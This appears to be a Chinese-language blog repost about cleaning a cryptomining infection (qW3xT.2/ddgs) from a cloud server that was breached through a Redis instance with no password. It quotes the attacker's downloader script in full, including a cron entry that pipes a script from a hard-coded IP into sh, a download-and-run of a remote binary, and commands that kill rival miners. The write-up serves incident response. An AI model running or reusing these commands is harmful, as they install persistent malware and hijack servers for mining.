在阿里云使用redis，開(kāi)啟了6379端口，但是當(dāng)時(shí)并沒(méi)有對(duì)redis的密碼進(jìn)行設(shè)置。

在晚上一點(diǎn)左右。阿里云給我發(fā)短信，告訴我服務(wù)器出現(xiàn)緊急安全事件。建議登錄云盾-態(tài)勢(shì)感知控制臺(tái)查看詳情和處理。

于是早上開(kāi)啟電腦，連接服務(wù)器，使用top查看cpu狀態(tài)。結(jié)果顯示進(jìn)程占用cpu99%以上。

在網(wǎng)上百度，了解到qW3xT.2是一個(gè)挖礦病毒。也就是說(shuō)別人利用你的電腦挖礦。謀取利益。

解決辦法：

1、首先解決redis入口問(wèn)題，因?yàn)樽铋_(kāi)始沒(méi)有設(shè)置密碼，所以首先修改redis.conf。設(shè)置密碼，然后重啟redis

2、進(jìn)入/tmp文件夾下。發(fā)現(xiàn)qW3xT.2文件，刪除。之后kill掉qW3xT.2該進(jìn)程，但是一段時(shí)間之后，發(fā)現(xiàn)該行程又重新啟動(dòng)。

肯定是有守護(hù)進(jìn)程，觀察top命令下的進(jìn)程，發(fā)現(xiàn)一個(gè)可疑的進(jìn)行

3、在/tmp文件夾下發(fā)現(xiàn)該進(jìn)程的文件 ls /tmp

發(fā)現(xiàn)qW3xT.2文件又重新生成了。這時(shí)，首先刪除qW3xT.2文件和ddgs.3013文件，然后使用top查詢qW3xT.2和ddgs.3013的pid，直接kill掉。

4、一段時(shí)間之后，刪除的文件重新生成，dds和挖礦的進(jìn)程又重新執(zhí)行。此時(shí)懷疑是否有計(jì)劃任務(wù)，此時(shí)查看計(jì)劃任務(wù)的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

刪除計(jì)劃任務(wù)?crontab -r

curl 的這幾個(gè) optional 介紹,我也是百度的
-f ?- fail在HTTP錯(cuò)誤（H）上靜默失敗（根本沒(méi)有輸出）
-s ?-silent靜音模式。 不要輸出任何東西
??????--socks4 HOST [：PORT]給定主機(jī)+端口上的SOCKS4代理
??????--socks4a HOST [：PORT]給定主機(jī)+端口上的SOCKS4a代理
??????--socks5 HOST [：PORT]給定主機(jī)+端口上的SOCKS5代理
??????--socks5-hostname HOST [：PORT] SOCKS5代理，將主機(jī)名傳遞給代理
??????--socks5-gssapi-service名稱為gssapi的SOCKS5代理服務(wù)名稱
??????--socks5-gssapi-nec與NEC SOCKS5服務(wù)器的兼容性
-S ??--show-error顯示錯(cuò)誤。 使用-s時(shí)，make curl會(huì)在出現(xiàn)錯(cuò)誤時(shí)顯示錯(cuò)誤
-L ??--location遵循重定向（H）
??????--location-trusted like --location并將auth發(fā)送給其他主機(jī)（H）
?

此時(shí)計(jì)劃任務(wù)已經(jīng)刪除。詳細(xì)信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

計(jì)劃任務(wù)刪除完成之后，這個(gè)13又開(kāi)始運(yùn)行。太頑固了。

?

于是我又看計(jì)劃任務(wù)的內(nèi)容，是否是有東西沒(méi)有刪除干凈。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
????
????curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
?

發(fā)現(xiàn)計(jì)劃任務(wù)在服務(wù)器中創(chuàng)建了幾個(gè)文件，

/var/spool/cron/crontabs/root

/var/spool/cron/root

內(nèi)容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。（與計(jì)劃任務(wù)相同）

將計(jì)劃任務(wù)中創(chuàng)建的文件刪除。

最終，這個(gè)挖礦病毒終于刪除完成

crontab命令解釋

*/5 * * * * Command ??????????????????????每5分鐘執(zhí)行一次命令

5 * * * * Command ????????????????????????每小時(shí)的第5分鐘執(zhí)行一次命令
30 18 * * * Command?????????????????????指定每天下午的 6:30 執(zhí)行一次命令?
30 7 8 * * Command??????????????????????指定每月8號(hào)的7：30分執(zhí)行一次命令?
30 5 8 6 * Command?????????????????????指定每年的6月8日5：30執(zhí)行一次命令?
30 6 * * 0 Command??????????????????????指定每星期日的6:30執(zhí)行一次命令

設(shè)置定時(shí)任務(wù)：echo '*/1 * * * * root echo "123" >> /tmp/1.txt' > /etc/crontab

查看用戶定時(shí)任務(wù)：crontab -l

編輯用戶定時(shí)任務(wù)：crontab -e

路徑存放處：

• /etc/crontab
• /var/spool/cron/root
• /var/spool/cron/crontabs/root

總結(jié)

以上是生活随笔為你收集整理的解决挖矿病毒（定时任务、计划任务、系统定时器、定时启动、crontab、入侵）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。